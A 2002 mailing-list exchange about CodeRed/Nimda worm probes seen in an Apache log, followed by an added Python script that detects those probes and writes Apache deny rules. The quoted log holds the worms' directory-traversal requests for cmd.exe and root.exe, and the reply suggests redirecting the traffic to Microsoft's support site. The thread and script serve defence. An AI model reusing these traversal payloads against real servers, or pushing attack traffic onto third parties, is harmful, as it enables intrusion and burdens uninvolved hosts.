[Techtalk] outlook virii

FerrariGirl FerrariGirl at yahoo.com
Sat Apr 13 09:30:51 EST 2002


There is a program called codeblue that is out there that will scan your 
apache logs and then send an email to the offending server that they are 
infected.  This works on CodeRed, CodeRedII, and Nimda.  Or if you 
really don't want it, you can forward the request to, say, 
support.microsoft.com

Davis, Jennifer wrote:

>Hi:
>
>	I was wondering if it was possible to send some sort of message back
>to people (like maybe a popup message) when they hit my webserver that
>surfing with viruses on their system is just not cool.  See an excerpt from my
>log below.  I estimate that 95% of the hits to my web server are these
>exploit attempts.  Barring that, is there a way to block an IP that we'll say
>is looking for root.exe?  The webserver is a standard Apache 1.3?  that came
>with Slackware 8.0.
>
>Thanks again
>Jenn
>
>Jennifer Davis
>Constitutional & Administrative Law - Droit administratif & constitutionnel
>Department of Justice Canada - Ministère de la Justice du Canada
>*(613) 957-4963 - fx (613) 941-1937
>*jdavis at justice.gc.ca
>
>64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
>stem32/cmd.exe?/c+dir HTTP$
>64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
>64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
>64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
>64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
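As an added example (not codeblue, and not code from either mail), here is a small Python scanner that does the log-scanning half of what the reply describes, run over the probes in Jenn's log: it parses Apache common-log lines, URL-decodes the request path so the double-encoded traversal does not hide the target file, counts root.exe/cmd.exe probes per client address, and emits Apache 1.3 mod_access `Deny from` lines for hosts at or above a threshold. The sample lines are the quoted log entries re-joined onto single lines plus one constructed benign request; the threshold of 3 is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: four probe lines from the quoted log, re-joined onto one
# line each (the mail client wrapped them), plus one ordinary request.
SAMPLE_LOG = """\
64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
192.0.2.7 - - [10/Apr/2002:17:12:00 -0400] "GET /index.html HTTP/1.0" 200 2326
"""

# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# The two target filenames every probe in the quoted log asks for.
PROBE_RE = re.compile(r'(root\.exe|cmd\.exe)', re.IGNORECASE)

def normalise(path):
    """Decode the path twice so double-encoded traversal (..%255c..) and the
    overlong UTF-8 forms (..%c0%af..) are reduced to their plain equivalents;
    invalid byte sequences are replaced rather than raising."""
    return unquote(unquote(path, errors="replace"), errors="replace")

def scan(log_text):
    """Return {client_ip: number_of_probe_requests} for a block of log text."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line: skip it, don't crash the scan
        ip, _ts, _method, path, _status, _size = m.groups()
        if PROBE_RE.search(normalise(path)):
            hits[ip] += 1
    return dict(hits)

def deny_directives(hits, threshold=3):
    """Apache 1.3 mod_access block (for httpd.conf or .htaccess) denying every
    client that sent at least `threshold` probes; everyone else stays allowed."""
    lines = ["Order allow,deny", "Allow from all"]
    for ip in sorted(ip for ip, n in hits.items() if n >= threshold):
        lines.append(f"Deny from {ip}")
    return lines

if __name__ == "__main__":
    counts = scan(SAMPLE_LOG)
    print(counts)
    print("\n".join(deny_directives(counts)))
```

The sending hosts are themselves infected machines rather than a deliberate attacker, so a static deny list grows fast; the per-IP counts are better fed into notification tooling of the kind the reply mentions than hand-edited into httpd.conf.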